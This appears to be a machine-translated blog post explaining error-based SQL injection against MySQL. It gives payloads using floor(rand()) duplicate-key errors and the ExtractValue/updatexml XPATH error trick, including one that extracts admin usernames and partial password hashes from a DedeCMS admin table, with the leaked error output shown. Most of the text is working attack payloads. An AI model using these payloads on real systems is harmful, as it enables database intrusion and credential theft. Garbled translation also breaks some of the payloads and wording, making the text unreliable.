Exploitation of mysql error messages

In many cases, injection cannot be performed directly and conveniently, so BENCHMARK has delayed injection;
If you can get the MySQL error message (the mysql error must be actively output by the program, mysql_error () is called in php, and other scripts may have their own functions ), now we have a more convenient method.
There are two methods available on the Internet:
========================================================== ======================================

The first type is omitted. mysql of earlier versions is applicable.
Html> http://hi.baidu.com/toby57/blog/item/26416060c1d92c48eaf8f839.html

========================================================== ======================================

Second:

SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2), (SELECT x) a from information_schema.tables group by a) B;

ERROR 1062 (23000): Duplicate entry 1x for key group_key

This method has no requirements for the MySQL version, but only 64 bytes of data can be burst. In this way, big data can only be MID.

(Select 1 from (select count (*), concat (++), floor (rand (0) * 2) x from information_schema.tables group by x) k)

========================================================== ======================================

Third:

The data is burst by passing parameters that do not conform to the XPATH syntax rules to the ExtractValue and updataxml functions. (This function is only applicable to MySQL 5.1 +, less than 5.1)

SELECT 1 AND ExtractValue (1, CONCAT (0x5c, (SELECT @ VERSION )))

ERROR 1105 (HY000): XPATH syntax error: 5.1.40-community

SELECT 1 FROM dede_admin WHERE updatexml (1, (select concat (0x5b, uname, 0x3a, MID (pwd, 4,16), 0x5d) FROM dede_admin), 1 );

ERROR 1105 (HY000): XPATH syntax error: [admin: 7a57a5a743894a0e]

Updatexml (1, CONCAT (0x5c, (SELECT @ VERSION), 1 );

This method is more convenient and concise than the previous method. However, this method can only expose 32 bytes of data. Similarly, big data can only be Mid.

Baidu has two functions:
EXTRACTVALUE (XML_document, XPath_string );
The first parameter: XML_document is in String format and is the name of the XML document object. The parameter is Doc.
The second parameter is XPath_string (an Xpath string ).
Purpose: return the string containing the queried value from the target XML.
UPDATEXML (XML_document, XPath_string, new_value );
The first parameter: XML_document is in String format and is the name of the XML document object. The parameter is Doc.
The second parameter is XPath_string (a string in the Xpath format). If you do not know the Xpath syntax, you can find the tutorial online.
The third parameter: new_value, String format, replace the searched data that meets the condition
Purpose: change the value of a qualified node in the document.